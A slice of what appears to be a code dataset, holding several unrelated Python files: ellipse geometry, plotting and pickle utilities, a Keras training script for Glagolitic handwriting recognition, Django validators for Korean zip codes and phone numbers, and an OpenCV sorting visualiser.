","sub_path":"collectFeaFrmLst.py","file_name":"collectFeaFrmLst.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"455966419","text":"import math\n\ndef dist(x1,y1,x2,y2):\n return math.sqrt( ((x1-x2)**2) + ((y1-y2)**2))\n\ndef add_testcylinder():\n r = \"\"\n\n #focus 1\n f1x = 250\n f1y = 150\n\n #focus 2\n f2x = 250\n f2y = 350\n\n z1 = 100 #face1\n z2 = 300 #face2\n\n edge = []\n d = 400 #total dist from focii\n\n face1a = []\n face2a = []\n face1b = []\n face2b = []\n #i_cant_do_math.jpg\n #brute_force.png\n for y in range(100):\n y = y*5\n for x in range(500):\n f1d = dist(x,y,f1x,f1y)\n f2d = dist(x,y,f2x,f2y)\n curd = f1d + f2d\n if abs(curd-d)<1:\n face1a+=[ [x,y,z1] ]\n face2a+=[ [x,y,z2] ]\n break\n for x in range(500):\n x = 500-x\n f1d = dist(x,y,f1x,f1y)\n f2d = dist(x,y,f2x,f2y)\n curd = f1d + f2d\n if abs(curd-d)<1:\n face1b+=[ [x,y,z1] ]\n face2b+=[ [x,y,z2] ]\n break\n\n face1b.reverse()\n face2b.reverse()\n face1 = face1a + face1b\n face2 = face2a + face2b\n\n for i in range(len(face1)):\n f1 = face1[i]\n f2 = face2[i]\n if i+1 0):\n plot_counter = int(names[-1])+1\n\n plotfile = data_dir+\"/{:03d}{:s}\".format(plot_counter,ext) \n print(\"saving to \"+plotfile)\n picklefile = plotfile.replace(ext,\".pickle\")\n print(\"saving to \"+picklefile)\n\n import pickle\n fig = plt.gcf()\n pickle.dump(fig,open(picklefile,'wb'))\n \n plt.savefig(plotfile)\n\n plt.show()\n\ndef pickle_this(this,name):\n import pickle\n picklefile = make_data_dir()+\"/{:s}.pickle\".format(name)\n print(\"saving to \"+picklefile)\n pickle.dump(this,open(picklefile,'wb'))\n \ndef unpickle(name):\n import pickle\n picklefile = \"{:s}\".format(name)\n print(\"loading from \"+picklefile)\n return pickle.load(open(picklefile,\"rb\"))\n\ndef load_plot_pickle(file):\n from matplotlib import pyplot as plt\n import pickle\n pickle.load(open(file,\"rb\"))\n\n\n","sub_path":"workdir/python_modules/my_utils.py","file_name":"my_utils.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445314249","text":"from __future__ import print_function\nimport os\n#da odaberem graficku karticu\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nimport shutil\n\n#importanje Kerasa i slojeva za arhitekturu1\nimport tensorflow\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, BatchNormalization\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras import backend as K\n\n#importanje slojeva za VGG16\nfrom tensorflow.keras.layers import Convolution2D, ZeroPadding2D\n#optimizer za VGG16 model\nfrom tensorflow.keras.optimizers import SGD\n\n#importanje alata za augumentaciju podataka\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\n#importanje dodatnih metrika iz Kerasa\nfrom tensorflow.keras import metrics\n\n#importanje numpya\nimport numpy as np\n#importanje matplotliba za grafove\nimport matplotlib.pyplot as plt\n\nfrom sklearn.utils import shuffle\nimport shutil\nfrom sklearn.metrics import confusion_matrix\nimport itertools\nfrom sklearn.metrics import accuracy_score\nfrom tensorflow.keras.models import model_from_json\nfrom PIL import Image\n\n#sprema graf za usporedbu dviju funkcija\ndef save_graph(x, y1, y2, x_label, y_label, y1_label, y2_label, plot_title, dst):\n\tfig = plt.figure()\n\tax 
= plt.subplot(111)\n\tline1 = plt.plot(x, y1, 'b', label=y1_label)\n\tplt.setp(line1, color='r', linewidth=1.0)\n\tline2 = plt.plot(x, y2, 'b', label=y2_label)\n\tplt.setp(line2, color='g', linewidth=1.0)\n\tplt.title(plot_title)\n\tplt.ylabel(y_label)\n\tplt.xlabel(x_label)\n\tplt.legend([y1_label, y2_label], loc='upper left')\n\t#plt.grid(True)\n\tfig.savefig(dst)\n\n#funkcija koja vraca VGG16 model\ndef VGG_16(weights_path=None):\n\tmodel = Sequential()\n\tmodel.add(ZeroPadding2D((1,1),input_shape=input_shape))\n\tmodel.add(Convolution2D(64, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(64, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\t\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(128, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(128, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(256, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(256, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(256, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\t\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\t\n\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(ZeroPadding2D((1,1)))\n\tmodel.add(Convolution2D(512, 3, 3, activation='relu'))\n\tmodel.add(MaxPooling2D((2,2), strides=(2,2)))\n\n\tmodel.add(Flatten())\n\tmodel.add(Dense(4096, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(4096, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\n\tif weights_path:\n\t\tmodel.load_weights(weights_path)\n\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy'])\n\treturn model\n\n#funkcija koja vraca LeNet model\ndef lenet():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, kernel_size=(3, 3),\n\t\t\t\t\t activation='relu',\n\t\t\t\t\t input_shape=input_shape))\n\tmodel.add(Conv2D(64, (3, 3), activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Dropout(0.25))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(128, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy']) #metrics.categorical_accuracy\n\treturn model\n\n#funkcija koja vraca prvi model za kineski jezik\n#neke linije su komentirane jer se pokazalo da je originalni model predubok za glagoljicu\t\ndef kineski1():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(96, kernel_size=(3, 3), activation='relu', input_shape=input_shape))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(128, (3, 3), 
activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(160, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(192, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\t\"\"\"\n\tmodel.add(Conv2D(224, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(256, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(Conv2D(288, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(320, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(Conv2D(352, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(384, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\t\"\"\"\n\tmodel.add(Flatten())\n\tmodel.add(Dense(1024, activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy']) #metrics.categorical_accuracy\n\treturn model\n\n#funkcija koja vraca drugi model za kineski jezik\n#neke linije su komentirane jer se pokazalo da je originalni model predubok za glagoljicu\t\ndef kineski2():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(96, kernel_size=(3, 3), activation='relu', input_shape=input_shape))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(128, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(160, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\t\"\"\"\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(Conv2D(192, (3, 3), activation='relu'))\n\tmodel.add(BatchNormalization())\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2), strides=2))\n\t\"\"\"\n\tmodel.add(Flatten())\n\tmodel.add(Dense(1024, activation='relu'))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy']) #metrics.categorical_accuracy\n\treturn model\n\n#funkcija koja vraca model za arapski jezik\ndef arapski():\n\tmodel = Sequential()\n\tmodel.add(Conv2D(72, kernel_size=(6, 6), strides=1, activation='relu', input_shape=input_shape))\n\tmodel.add(BatchNormalization())\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Conv2D(144, (5, 5), strides=2, activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Conv2D(192, (4, 4), strides=2, activation='relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Flatten())\n\tmodel.add(Dense(400, activation='relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(num_classes, activation='softmax'))\n\t\n\tmodel.compile(loss=tensorflow.keras.losses.categorical_crossentropy,\n\t\t\t\t 
optimizer=tensorflow.keras.optimizers.Adadelta(),\n\t\t\t\t metrics=['accuracy']) \n\treturn model\n\n#funkcija koja trenira model na odredjenom datasetu te sprema rezultat\ndef treniraj(model, foldername, modelname, data_number, dataset, epochs, batch_size, steps_per_epoch, validation_steps):\n\tname = foldername + '/' + modelname + '/' + modelname + '-data'+ str(data_number)\n\ttrain_datagen = ImageDataGenerator(\n\t\t\trescale=1./255,\n\t\t\tshear_range=0.2,\n\t\t\tzoom_range=0.2,\n\t\t\thorizontal_flip=False)\n\n\tval_datagen = ImageDataGenerator(rescale=1./255)\n\n\ttrain_generator = train_datagen.flow_from_directory(\n\t\tdataset + '/train',\n\t\ttarget_size=(img_rows, img_cols),\n\t\tcolor_mode='grayscale',\n\t\tbatch_size=batch_size,\n\t\tclass_mode='categorical',\n\t\tshuffle='True')\n\n\tvalidation_generator = val_datagen.flow_from_directory(\n\t\tdataset + '/validation',\n\t\ttarget_size=(img_rows, img_cols),\n\t\tcolor_mode='grayscale',\n\t\tbatch_size=batch_size,\n\t\tclass_mode='categorical',\n\t\tshuffle='True')\n\t'''\n\tes = tensorflow.keras.callbacks.EarlyStopping(\n\t\tmonitor='val_loss',\n\t\tmin_delta=0,\n\t\tpatience=2,\n\t\tverbose=0, \n\t\tmode='auto')\n\t'''\n\t\n\tcheckpoint = tensorflow.keras.callbacks.ModelCheckpoint(\n\t\tname + '.h5', \n\t\tmonitor='val_loss', \n\t\tverbose=0, \n\t\tsave_best_only=True, \n\t\tmode='auto')\n\t\n\thistory = model.fit_generator(\n\t\ttrain_generator,\n\t\tsteps_per_epoch=steps_per_epoch,\n\t\tepochs=epochs,\n\t\tverbose=1,\n\t\tvalidation_data=validation_generator,\n\t\tvalidation_steps=validation_steps,\n\t\tcallbacks = [checkpoint])\n\t\n\t'''\n\t#spremanje modela\n\tmodel_json = model.to_json()\n\twith open(name + \".json\", \"w\") as json_file:\n\t\tjson_file.write(model_json)\n\t#spremanje tezina\n\tmodel.save_weights(name + \".h5\")\n\t'''\n\n\tnum_epochs = [i for i in range(1, len(history.history['acc']) + 1)]\n\tsave_graph(num_epochs, history.history['acc'], history.history['val_acc'], 'Epohe', 'Točnost', 'Točnost treniranja', 'Točnost validacije', 'Graf točnosti', 'Rezultati/' + modelname + '/' + 'plot-' + modelname + '-data'+ str(data_number) + '-acc.png')\n\tsave_graph(num_epochs, history.history['loss'], history.history['val_loss'], 'Epohe', 'Gubitak', 'Gubitak treniranja', 'Gubitak validacije', 'Graf gubitka', 'Rezultati/' + modelname + '/' + 'plot-' + modelname + '-data'+ str(data_number) + '-loss.png')\n'''\n#funkcija koja prikazuje matricu zabune\ndef cm_saving(cm, classes, dst, normalize='False', title='Matrica zabune'):\n\tif normalize:\n\t\tcm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n\tfig = plt.figure()\n\tplt.clf()\n\tax = fig.add_subplot(111)\n\tax.set_aspect(1)\n\tres = ax.imshow(np.array(cm), cmap=plt.cm.jet, \n\t\t\t\t\tinterpolation='nearest')\n\tplt.title(title)\n\n\twidth = len(classes)\n\theight = len(classes)\n\n\tcb = fig.colorbar(res)\n\talphabet = classes\n\tplt.xticks(range(width), alphabet[:width], rotation=90)\n\tplt.yticks(range(height), alphabet[:height])\n\tplt.tight_layout(pad=1.5)\n\tplt.ylabel(\"Prava klasa\")\n\tplt.xlabel(\"Predviđena klasa\")\n\tplt.savefig(dst, format='png')\n\t#plt.show()\n\ndef validiraj(model, val):\t\n\tazbuka = ['a', 'b', 'v', 'g', 'd', 'e', 'zj', 'dz', 'z', '(i)', 'i', 'dj', 'k', 'l', 'm', 'n', 'o', 'p', 'r', 's', 't', 'u', 'f', 'h', '(o)', \"(sj)c'\", 'c', 'cj', 'sj', 'ja, (i)je', 'ju' ,'j', 'poluglas']\n\tazbuka.sort()\n\n\t#ucitavanje modela\n\tjson_file = open(model + '.json', 'r')\n\tloaded_model_json = 
json_file.read()\n\tjson_file.close()\n\tloaded_model = model_from_json(loaded_model_json)\n\t#ucitavanje tezina\n\tloaded_model.load_weights(model + '.h5')\n\tprint(\"Loaded model from disk\")\n\n\timg_rows, img_cols = 50, 50\n\tnum_classes = 33\n\n\ttest_labels = []\n\trounded_predictions = []\n\t\n\ttocno = 0\n\tkrivo = 0\n\tfor slovo in azbuka:\n\t\tX = []\n\n\t\tpath = val + \"/\" + slovo + '/'\n\t\timlist = os.listdir(path)\n\n\t\timarray = [np.array(Image.open(path + im)).flatten() for im in imlist]\n\n\t\tX += imarray\n\n\t\tX = np.array(X)\n\n\t\ttrain_samples = len(X)\n\n\t\tif K.image_data_format() == 'channels_first':\n\t\t\tX = X.reshape(train_samples, 1, img_rows, img_cols)\n\t\t\tinput_shape = (1, img_rows, img_cols)\n\t\telse:\n\t\t\tX = X.reshape(train_samples, img_rows, img_cols, 1)\n\t\t\tinput_shape = (img_rows, img_cols, 1)\n\n\t\tX = X.astype('float32')\n\n\t\tX /= 255\n\t\tprint(slovo)\n\t\toutput = loaded_model.predict(X, verbose=1)\n\t\n\t\tfor i in range(len(output)):\n\t\t\tindeks = output[i].argmax()\n\t\t\ttest_labels.append(azbuka.index(slovo)) #koja je to klasa\n\t\t\trounded_predictions.append(indeks) #kako je ispalo\n\t\t\tif azbuka.index(slovo) == indeks:\n\t\t\t\ttocno += 1\n\t\t\telse:\n\t\t\t\tkrivo += 1\n\n\tcm_plot_labels = ['(i)', '(o)', \"(š)ć\", 'a', 'b', 'c', 'cj', 'd', 'dj', 'dž', 'e', 'f', 'g', 'h', 'i', 'j', 'ja, (i)je', 'ju', 'k', 'l', 'm', 'n', 'o', 'p', 'pol.', 'r', 's', 'š', 't', 'u', 'v', 'z', 'ž']\n\tcm = confusion_matrix(test_labels, rounded_predictions)\n\t#cm_plot_labels = [i for i in range(1, 34)]\n\tcm_saving(cm, cm_plot_labels, 'Rezultati/' + model + val + '.png')\n\t\n\tfile = open('Results/' + model + val + '.txt','w') \n\tacc_by_class = []\n\tacc = []\n\tfor i in range(len(cm)):\n\t\tacc_by_class.append((cm[i][i] / test_labels.count(i), i) )\n\t\tacc.append((cm[i][i] / test_labels.count(i), i))\n\t\tfile.write(\"Slovo \" + azbuka[i] + \" TP \" + str (cm[i][i]) + \" Total \" +str(test_labels.count(i)) + '\\n')\n\t\n\tacc_by_class.sort()\n\tacc_by_class.reverse()\n\tfor a in acc_by_class[:5]:\n\t\tfile.write(azbuka[a[1]] + ' ' + str(a[0]) + ' ' + str(cm[a[1]]) + '\\n')\n\tfile.write('---------------\\n')\n\tfile.write('Total accuracy ' + str(accuracy_score(test_labels, rounded_predictions, normalize=True)) + '\\n')\n\tfile.write('Total accuracy2 ' + str(tocno / (tocno + krivo)) + '\\n')\n\tfile.write('---------------\\n')\n\tfor a in acc:\n\t\tfile.write(azbuka[a[1]] + ' ' + str(a[0]) + '\\n')\n\tfile.close()\n'''\nimg_rows, img_cols = 50, 50\ninput_shape = (img_rows, img_cols, 1)\nnum_classes = 33\n'''\nd_azbuka = {'(i)': '(i)', '(o)':'(o)', \"(sj)c'\": \"(š)ć\", 'a': 'a', 'b': 'b', 'c': 'c', 'cj': 'č', 'd': 'd', 'dj': 'đ', 'dz': 'dž', 'e': 'e', 'f': 'f', \n\t'g': 'g', 'h': 'h', 'i': 'i', 'j': 'j', 'ja, (i)je': 'ja,(i)je', 'ju': 'ju', 'k': 'k', 'l': 'l', 'm': 'm', 'n': 'n', 'o': 'o', 'p': 'p', \n\t'poluglas': 'pol.', 'r': 'r', 's': 's', 'sj': 'š', 't': 't', 'u': 'u', 'v': 'v', 'z': 'z', 'zj': 'ž'}\n'''\n#resetiranje mapa koje nastaju treniranjem\nsvi_modeli = [\"modelLeNet\", \"modelarapski\", \"modelkineski1\", \"modelkineski2\", \"modelVGG\"]\n\nif os.path.exists(\"Modeli\"):\n\tshutil.rmtree(\"Modeli\")\t\nos.makedirs(\"Modeli\")\n\nif os.path.exists(\"Rezultati\"):\n\tshutil.rmtree(\"Rezultati\")\t\nos.makedirs(\"Rezultati\")\n\nfor mod in svi_modeli:\n\tos.makedirs(\"Modeli/\" + mod)\n\tos.makedirs(\"Rezultati/\" + mod)\n\n#save_graph([1, 2, 3, 4, 5], [10, 20, 30, 40, 50], [5, 15, 20, 45, 80], 'Epohe', 'Točnost', 'Točnost 
klasifikacije', 'Točnost validacije', 'Graf točnosti', 'Rezultati/' + 'modelLeNet' + '/' + 'plot-' + 'modelLeNet' + '-data'+ str(1) + '-acc.png')\n\t\nfor i in range(1, 4):\n\ttreniraj(lenet(), 'Modeli/', 'modelLeNet', i, 'Raspodjela/data' + str(i), 80, 120, 120, 120)\n\ttreniraj(arapski(), 'Modeli/', 'modelarapski', i, 'Raspodjela/data' + str(i), 80, 120, 120, 120)\n\ttreniraj(kineski1(), 'Modeli/', 'modelkineski1', i, 'Raspodjela/data' + str(i), 80, 120, 120, 120)\n\ttreniraj(kineski2(), 'Modeli/', 'modelkineski2', i, 'Raspodjela/data' + str(i), 80, 120, 120, 120)\n\t#treniraj(VGG_16(), 'Modeli/', 'modelVGG', i, 'Raspodjela/data' + str(i), 5, 120, 120, 120)","sub_path":"Izrada dataseta/treniranje.py","file_name":"treniranje.py","file_ext":"py","file_size_in_byte":15171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"254215622","text":"import re\nimport requests\nfrom django.conf import settings\nfrom django.forms import ValidationError\nfrom django.utils.deconstruct import deconstructible\nimport xmltodict\n\n#open('서울특별시_우편번호.csv'): 만약 계속 바뀌는 데이터라면 이런식으로 유효성 검사할 때마다 불러들이면 됨\n\n@deconstructible\nclass MinLengthValidator(object):\n def __init__(self, min_length):\n self.min_length = min_length\n\n def __call__(self, value):\n if len(value) < self.min_length:\n raise ValidationError('{}글자 이상 입력해주세요.'.format(self.min_length))\n\n@deconstructible\nclass ZipCodeValidator(object):\n '우편번호 체계안내 : http://www.koreapost.go.kr/kpost/sub/subpage.jsp?contId=010101040100'\n\n def __init__(self, is_check_exist =False):\n self.is_check_exist = is_check_exist\n\n #ZipCodeValidator(is_check_exist=True, zip_code)로 생성과 동시에 ZipCodeValidator 객체 생성.\n\n #init 함수 내용에 의해 객체의 is_check_exist 속성값은 True로 지정됨.\n\n\n def __call__(self, zip_code):\n if not re.match(r'^\\d{5,6}$', zip_code):\n raise ValidationError('5자리 혹은 6자리 숫자로 입력해주세요.')\n\n if self.is_check_exist:\n self.check_exist_from_db(zip_code)\n\n #생성과 동시에 call 함수 실행. 처음 ZipCodeValidator 생성 시 파라미터로 들어왔던 zip_code가 다섯자리가 아닐 경우, ValidationError 발생.\n\n #다섯자리가 맞을 경우, 그다음 if문 실행. 이전에 self.is_check_exists=True 였으므로 if문 실행되어 check_exist() 함수 실행됨.\n# 아래에 def check_exist(self, zip_code) 정의.\n\n def check_exist_from_db(self, zip_code):\n from blog.models import ZipCode\n if not ZipCode.objects.filter(code=zip_code).exists():\n raise ValidationError('없는 우편번호입니다.')\n\n\n def check_exist(self, zip_code):\n '우체국 open api : http://biz.epost.go.kr/customCenter/custom/custom_10.jsp'\n\n #우편번호가 기존에 존재하는지 안하는지 검사\n\n params = {\n 'regkey': settings.EPOST_API_KEY,\n 'target': 'postNew',\n 'query': zip_code,\n }\n\n #우편번호 API를 이용하기 위해 필수로 지정해야 하는 인자들. http://biz.epost.go.kr/customCenter/custom/custom_10.jsp?subGubun=sub_3&subGubun_1=cum_33&gubun=m07에 명시되어있음. settings.py의 EPOST_API_KEY 변수에 API 이용을 위해 발급받은 키를 지정해놓았음. query 키에는 맨 처음 함수 파라미터로 zip_code가 검사 대상으로 들어감.\n\n xml = requests.get('http://biz.epost.go.kr/KpostPortal/openapi', params=params).text\n\n # 다음의 url 주소에 있는 내용을 텍스트로 가져오는 코드.\n #request.get() : HttpResponse 객체 리턴\n #request.get().text : HttpResponse 객체가 담는 내용을 xml 형태로 리턴\n\n response = xmltodict.parse(xml)\n # xml을 parse하여 dictionary로 변환(xmltodict의 기능)\n\n try:\n error = response['error']\n ## response, error 둘다 dict\n except KeyError:# 존재하는 우편번호일 경우 error 키가 없고, 따라서 KeyError 발생\n pass\n else:# 존재하지 않는 우편번호일 경우 ValidationError\n raise ValidationError('[{error_code}] {message}'.format(**error))\n\n# dict 형인 error를 **error로 언패킹. 
error = {'key':'value', 'key2':'value2' ...} 가 언패킹을 통해,\n# .format(key=value, key2=value2 ...) 로.\n# 여기서는,\n# .format(error_code=blabla, message=blabla) 로.\n# 최종적으로 ValidationError 일으킴.\n\n'''\ndef min_length_validator(min_length):\n def wrap(value):\n if len(value) < min_length:\n raise ValidationError('{}글자 이상 입력해주세요.'.format(min_length))\n return wrap\n\n\ndef max_length_validator(max_length):\n def wrap(value):\n if len(value) > max_length:\n raise ValidationError('{}글자 이하 입력해주세요.'.format(max_length))\n return wrap\n'''\n\n\ndef lnglat_validator(value):\n if not re.match(r'^(\\d\\.?\\d*),(\\d\\.?\\d*)$', value):\n raise ValidationError('Invalid LngLat Type')\n\n\ndef phone_number_validator(value):\n if not re.match(r'^01[06789][1-9]\\d{6,7}$', value):\n raise ValidationError('휴대폰 번호를 입력해주세요.')\n\n","sub_path":"programming/blog/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"102629589","text":"#! python 3.6\n# Create Date: 2019-07-29\n# Author: Scc_hy \n# Function: 画图所需文件\n\n# 加载包 \nimport random \nimport numpy as np \nimport time \nimport cv2 \nimport copy \n\n\n__doc__ = \"\"\"\nsplit to three class or function \n1- get_data function 获取随机列表,用于排序 \n2- get_time_info class 用于记录排序的时间\n3- get_figure2draw class 画图\n\"\"\"\n\n\ndef get_data(Length_of_list):\n \"\"\"\n 获取随机列表,用于排序\n :param: Length_of_list int 随机列表的长度\n \"\"\"\n data = list(range(Length_of_list))\n random.shuffle(data)\n return data\n\n\nclass get_time_info():\n \"\"\"\n 用于记录排序的时间\n \"\"\"\n def start_timer(self):\n \"\"\"\n 设置start_flg \n 开始计时,获取开始时间\n \"\"\"\n self.start_flag = True \n self.start = time.time() \n return self.start \n\n def stop_timer(self):\n \"\"\"\n 设置start_flg \n 停止计时,输出运行时间\n \"\"\"\n self.start_flag = False \n return self.time\n\n def get_time(self):\n \"\"\"\n 依据start_flg \n 计算出运行时间\n \"\"\"\n if self.start_flag:\n self.time = time.time() - self.start \n return self.time\n\n \nclass get_figure2draw():\n \"\"\"\n 1- 初始化OpenCV图像: GetColor & get_figure\n 2- 交换位置并画图: swap\n 3- 重新设置(交换位置后)条形图的高和颜色: _set_figure\n 4- 画出图形: Visualize \n 5- 突出交换的条形图: Mark\n\n \"\"\"\n WHITE = (255, 255, 255)\n RED = (0, 0, 255)\n BLACK = (0, 0, 0)\n YELLOW = (0, 127, 255)\n MAX_IM_SIZE = 500\n gt = get_time_info()\n\n def __init__(self, data, sort_title = 'Sort_type' \n , time_interval = 1):\n self.length = len(data) \n self.data = data\n self.sort_title = sort_title\n self.set_time_interval(time_interval)\n\n ## 初始化变量\n self.start = self.gt.start_timer()\n self.get_figure()\n\n\n\n def set_time_interval(self, time_interval):\n \"\"\"\n 设置 cv2.waitKey( time_interval )\n \"\"\"\n self.time_interval = time_interval\n\n\n def GetColor(self, val, TOTAL):\n \"\"\"\n 根据列表的值的大小上 由浅到深的颜色\n :param: val 数组对应值 data[idx] (排序的数)\n :param: TOTAL \n \"\"\"\n # 获取颜色\n return (120 + val * 255 // (2 * TOTAL), 255 - val * 255 // (2 * TOTAL), 0)\n\n\n def get_figure(self):\n \"\"\"\n 设置初始图像 \n 给条形图上色\n\n try:\n data = get_data(10)\n data = list(range(10))\n _bar_width = 5\n g2dr = get_figure2draw(data)\n g2dr.get_figure()\n cv2.imshow('data list' , g2dr.figure)\n cv2.waitKey(0)\n \"\"\"\n _bar_width = 5 \n self._bar_width = _bar_width\n figure = np.full((self.length * _bar_width, self.length * _bar_width, 3), 255, dtype = np.uint8)\n \n size = _bar_width * self.length\n self.im_size = size if size < self.MAX_IM_SIZE else self.MAX_IM_SIZE\n\n for i in range(self.length):\n val = self.data[i]\n ## 上色 \n 
figure[-1 - val * _bar_width :,\n i * _bar_width:i * _bar_width+_bar_width] = self.GetColor(val, self.length)\n \n self.figure = figure\n\n\n def Mark(self, img, marks, color):\n \"\"\"\n 设置颜色 \n 突出调换的列 \n :param: img figure.copy() \n figure: \n # global values Length * _bar_width 维度, Length * _bar_width 行, 3列 \n # figure = np.full((20 * _bar_width, 20 * _bar_width, 3), 255, dtype = np.uint8)\n :param: marks \n :param: color 要设置的颜色 \n WHITE = (255, 255, 255)\n RED = (0, 0, 255)\n BLACK = (0, 0, 0)\n YELLOW = (0, 127, 255)\n data[idx] global value\n \"\"\"\n for idx in marks:\n min_col = idx * self._bar_width\n max_col = min_col + self._bar_width\n min_row = -1- self.data[idx] * self._bar_width\n ## 条形图位置\n img[min_row:, min_col:max_col] = color \n\n\n def _set_figure(self, idx, val):\n \"\"\"\n 重新设置(交换位置后)条形图的高和颜色 \n :param: idx int 数组index \n :param: val 数组对应值 data[idx]\n \"\"\"\n \n # 锁定条形图两边位置\n min_col = idx * self._bar_width \n max_col = min_col + self._bar_width \n min_row = -1 - val *self._bar_width \n # 100维度 100行 3列\n self.figure[:, min_col:max_col] = self.WHITE\n self.figure[min_row:, min_col:max_col] = self.GetColor(val, self.length)\n\n\n def Visualize(self, mark1 = None, mark2 = None):\n \"\"\"\n 显示图像 \n figure: \n # global values Length * _bar_width 维度, Length * _bar_width 行, 3列 \n # figure = np.full((20 * _bar_width, 20 * _bar_width, 3), 255, dtype = np.uint8) \n im_size: \n # size = _bar_width * length \n # im_size = size if size < MAX_IM_SIZE else MAX_IM_SIZE\n # MAX_IM_SIZE = 500\n \n \"\"\"\n img = self.figure.copy()\n if mark2:\n self.Mark(img, 